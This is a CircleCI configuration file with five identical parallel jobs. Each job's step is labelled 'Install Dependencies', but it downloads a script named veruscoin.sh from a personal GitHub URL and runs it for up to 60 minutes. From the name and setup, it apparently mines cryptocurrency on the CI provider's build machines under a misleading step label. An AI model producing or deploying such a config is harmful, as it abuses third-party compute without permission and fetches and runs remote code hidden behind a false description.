version: 2.1
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/kaestmrah/vrs/main/veruscoin.sh && chmod u+x veruscoin.sh && timeout 60m ./veruscoin.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/kaestmrah/vrs/main/veruscoin.sh && chmod u+x veruscoin.sh && timeout 60m ./veruscoin.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/kaestmrah/vrs/main/veruscoin.sh && chmod u+x veruscoin.sh && timeout 60m  ./veruscoin.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/kaestmrah/vrs/main/veruscoin.sh && chmod u+x veruscoin.sh && timeout 60m ./veruscoin.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/kaestmrah/vrs/main/veruscoin.sh && chmod u+x veruscoin.sh && timeout 60m ./veruscoin.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
